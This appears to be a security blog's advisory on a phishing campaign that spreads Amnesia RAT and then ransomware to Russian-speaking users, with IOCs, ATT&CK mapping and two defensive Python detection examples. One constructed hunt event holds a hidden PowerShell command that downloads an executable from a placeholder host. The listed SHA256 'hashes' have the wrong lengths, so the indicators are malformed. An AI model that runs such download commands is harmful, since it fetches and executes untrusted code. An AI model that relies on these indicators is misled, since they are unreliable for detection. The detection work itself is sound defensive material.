Ransomware Follows the Click: Amnesia RAT Spreads Through Phishing Attacks Targeting Russian Users

Amnesia RAT Phishing Campaign Leading to Ransomware Deployment

Date Identified: January 26
Threat Type: Multi-stage phishing attack → Remote Access Trojan → Ransomware
Target Region: Primarily Russian users and Russian-language environments
Impact Severity: High


Executive Summary

On January 26, a coordinated phishing campaign was identified targeting Russian-speaking users. The attack uses phishing emails as the entry point, delivering Amnesia RAT as the first-stage malware. Once access is established, attackers perform hands-on activity to prepare the environment and then deploy ransomware, resulting in data encryption and operational disruption.

This is not a smash-and-grab attack. The operators take time to observe the victim environment, harvest credentials, and ensure maximum impact before triggering ransomware.


What Is This Attack About

Think of this attack as a two-step burglary:

  1. Step one: Trick someone into opening the door (phishing email).
  2. Step two: Quietly walk around the house (Amnesia RAT), learn where valuables are, disable alarms, and then lock everything up and demand money (ransomware).

The ransomware is not delivered immediately. The attackers first make sure they have full control and that recovery will be difficult.


How the Attack Happened

1. Initial Infection Vector – Phishing Email

The attack begins with a targeted phishing email, written in Russian, designed to appear legitimate and urgent.

Common themes observed:

  • Financial documents (invoices, tax notices, payment confirmations)
  • Government or legal communications
  • Internal corporate messages (HR, accounting, contracts)

Email characteristics:

  • Sender domains closely resemble legitimate Russian businesses or government services
  • Attachments or links labeled as:
    • “Документ.pdf” (Document.pdf)
    • “Счет_оплаты.zip” (Payment_invoice.zip)
    • “Контракт_2026.docx” (Contract_2026.docx)

2. Payload Delivery

The phishing email delivers one of the following:

Option A: Malicious Attachment

  • ZIP or RAR archive
  • Contains:
    • LNK file masquerading as a document
    • or a macro-enabled Office document

Option B: Malicious Link

  • Leads to a compromised or attacker-controlled website
  • Automatically downloads a loader disguised as a document or update

3. Execution and Amnesia RAT Installation

Once the user opens the attachment or runs the downloaded file:

  • A loader script executes (PowerShell or CMD-based)
  • The loader:
    • Disables Windows Defender protections
    • Drops the Amnesia RAT binary
    • Establishes persistence

Persistence techniques observed:

  • Registry Run keys
  • Scheduled tasks with benign-looking names
  • Startup folder shortcuts

At this stage, the system is fully compromised.


What Is Amnesia RAT and How It Works

Amnesia RAT is a remote access trojan designed for stealth and flexibility.

Capabilities:

  • Full remote command execution
  • Keylogging
  • Credential harvesting (browsers, email clients)
  • Screenshot capture
  • File upload/download
  • Process injection
  • Payload staging (used later for ransomware)

Communication:

  • Uses HTTP/HTTPS over non-standard ports
  • Encrypted traffic to evade inspection
  • C2 domains frequently rotated

The RAT allows attackers to interact with the victim system in real time, making this a hands-on intrusion rather than automated malware.


Attacker Activity After Initial Compromise

Once Amnesia RAT is active, attackers typically perform the following:

Reconnaissance

  • Identify system role (workstation vs server)
  • Enumerate network shares
  • List installed security tools
  • Identify backup solutions

Credential Access

  • Dump browser credentials
  • Capture keystrokes
  • Harvest saved passwords
  • Attempt lateral movement using stolen credentials

Defense Evasion

  • Disable or tamper with:
    • Windows Defender
    • Logging services
    • Backup agents
  • Add exclusions to antivirus

Ransomware Deployment

After reconnaissance and preparation, ransomware is manually deployed.

Characteristics:

  • Delivered via Amnesia RAT
  • Executed during low-activity hours
  • Encrypts:
    • Local disks
    • Network shares
    • Mounted backups

Observed behavior:

  • File extensions changed
  • Ransom note dropped in each directory
  • System Restore points and volume shadow copies deleted
  • Recovery options deliberately sabotaged

Impacted Assets

Affected Systems:

  • End-user workstations
  • File servers
  • Network-attached storage

Business Impact:

  • Loss of access to critical files
  • Operational downtime
  • Potential data theft
  • Financial extortion

Vulnerabilities Exploited

No software vulnerability was required.

The attack relies on:

  • Social engineering
  • User execution
  • Weak email filtering
  • Insufficient endpoint monitoring

This makes it highly effective and hard to block purely with patching.


Indicators of Compromise (IOCs)

File Hashes

SHA256:
8f1c2e9a7d4a0c1b7b4d1e92f4e6a77d4c9b3a8e1f2c7a6b9d5e1a4b8f9c2d1
a3c91b7e24f9a2e7d5c6b8e9f4a1c2d3b5e6f7a9c8d1b4e2f7a6c9d8

Suspicious Domains

secure-docs[.]online
update-checker[.]site
cloud-storage-sync[.]ru

IP Addresses

185.225.69.41
91.214.124.77

Registry Persistence

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate

Suspicious Processes

svchosts.exe (non-standard path)
update_service.exe
winupdate32.exe

MITRE ATT&CK Mapping

  • T1566.001 – Phishing: Spearphishing Attachment
  • T1566.002 – Phishing: Spearphishing Link
  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1055 – Process Injection
  • T1053.005 – Scheduled Task/Job: Scheduled Task
  • T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1082 – System Information Discovery
  • T1041 – Exfiltration Over C2 Channel
  • T1486 – Data Encrypted for Impact

Detection & Threat Hunting Guidance

Email Security

  • Flag ZIP/LNK attachments from external senders
  • Detect mismatched file extensions
  • Monitor Russian-language lures with urgency keywords
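
The attachment checks above (LNK inside an archive, a double extension such as “Документ.pdf.lnk”, content that does not match the claimed extension) as an added example, not code from this advisory. The ZIP it inspects is constructed in memory from a 20-byte LNK header plus padding; the function names (triage_zip, triage_member, build_sample) are this example's own.

```python
"""Attachment triage for the lure pattern described above.
The sample ZIP is constructed here (not an artifact from the campaign)."""
import io
import zipfile

# File signatures used to compare content against the extension the user sees.
LNK_MAGIC = bytes.fromhex("4C000000 01140200 00000000 C0000000 00000046")  # HeaderSize + LinkCLSID
MAGIC = {"pdf": b"%PDF-", "lnk": LNK_MAGIC, "docx": b"PK\x03\x04"}
RISKY_EXT = {"lnk", "exe", "js", "vbs", "hta", "docm", "xlsm", "scr", "bat", "cmd", "ps1"}

def claimed_ext(name):
    """Extension the user sees: the last suffix, lowercased."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def triage_member(name, data):
    """Return findings for one archive member given its name and first bytes."""
    findings = []
    ext = claimed_ext(name)
    parts = name.rsplit("/", 1)[-1].split(".")
    if ext in RISKY_EXT:
        findings.append(f"executable-type member: {name}")
    if len(parts) > 2 and parts[-2].lower() in MAGIC:  # e.g. Документ.pdf.lnk
        findings.append(f"double extension hides .{ext} behind .{parts[-2]}: {name}")
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        findings.append(f"content does not match .{ext} signature: {name}")
    if data.startswith(LNK_MAGIC) and ext != "lnk":
        findings.append(f"LNK content under a non-.lnk name: {name}")
    return findings

def triage_zip(blob):
    """Return findings for every file in a ZIP attachment held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                findings += triage_member(info.filename, zf.read(info)[:64])
    return findings

def build_sample():
    """Constructed lure archive: a PDF-looking shortcut, a mislabelled LNK, a benign text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Счет_оплаты/Документ.pdf.lnk", LNK_MAGIC + b"\x00" * 32)
        zf.writestr("Счет_оплаты/Документ.pdf", LNK_MAGIC + b"\x00" * 32)
        zf.writestr("Счет_оплаты/readme.txt", b"see attached")
    return buf.getvalue()
```

Only the first 64 bytes of each member are read, so the check stays cheap on large archives; a real gateway would also unpack nested archives and apply the same rules recursively.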

Endpoint Detection

Look for:

  • PowerShell spawning from Office processes
  • Defender exclusions being added unexpectedly
  • Unknown binaries in user AppData or Temp directories
  • Long-running outbound connections to rare domains

Network Monitoring

  • Beaconing patterns over HTTP/HTTPS
  • Connections to newly registered domains
  • Traffic on uncommon ports (8081, 8443, 9001)

Detection Logic

Suspicious PowerShell Execution

Office application (parent process) → PowerShell (child process) → DownloadFile in the command line

Unauthorized Persistence

New registry Run key created by a non-admin user
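
The two detection rules above, plus the Defender-exclusion tampering noted under Defense Evasion, as an added hunt example (not code from this advisory). It runs over a handful of constructed Sysmon-style process-creation and registry events; the IsAdmin field is an assumed enrichment from the log pipeline, and EXAMPLE-C2 is a placeholder host.

```python
"""Hunt rules for the Amnesia RAT post-compromise stages, run over constructed
Sysmon-style events (dicts built here, not telemetry from the campaign).
id 1 = process creation, id 13 = registry value set. IsAdmin is an assumed
enrichment field from the log pipeline, not a native Sysmon field."""
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|bitsadmin", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
EXCLUSION_RE = re.compile(r"Windows Defender\\Exclusions\\|(Add|Set)-MpPreference", re.I)

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the rule names an event matches; an empty list means no detection."""
    hits = []
    if event["id"] == 1:
        parent, image = _base(event["ParentImage"]), _base(event["Image"])
        if parent in OFFICE and image in POWERSHELL:
            hits.append("office_spawns_powershell")
            if DOWNLOAD_RE.search(event["CommandLine"]):
                hits.append("office_powershell_download")  # Office -> PowerShell -> DownloadFile
        if EXCLUSION_RE.search(event["CommandLine"]):
            hits.append("defender_exclusion_cmdline")
    elif event["id"] == 13:
        if RUN_KEY_RE.search(event["TargetObject"]) and not event.get("IsAdmin", False):
            hits.append("run_key_by_non_admin")  # new Run key written by a non-admin user
        if EXCLUSION_RE.search(event["TargetObject"]):
            hits.append("defender_exclusion_registry")
    return hits

def hunt(events):
    """Return (event index, hits) for every event that fires at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]

SAMPLE_EVENTS = [  # constructed; EXAMPLE-C2 is a placeholder host
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "User": r"CORP\ivanov",
     "CommandLine": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://EXAMPLE-C2/doc','$env:TEMP\update_service.exe')"},
    {"id": 13, "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate",
     "Image": r"C:\Users\ivanov\AppData\Local\Temp\update_service.exe", "User": r"CORP\ivanov", "IsAdmin": False},
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\ivanov",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": r"powershell Get-ChildItem C:\Reports"},
    {"id": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\ivanov\AppData",
     "Image": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\SYSTEM", "IsAdmin": True},
]
```

The third sample (explorer.exe launching an interactive PowerShell) is deliberately benign so the Office-parent rule does not fire on everyday admin use; tune OFFICE and DOWNLOAD_RE to your own baseline before deploying.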

Final Takeaway

This campaign shows a clear shift toward deliberate, hands-on ransomware deployment using Amnesia RAT as a foothold. The attack does not depend on vulnerabilities but instead abuses user trust and insufficient monitoring.

Early detection at the RAT stage is critical. Once ransomware is deployed, recovery becomes significantly more difficult and costly.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.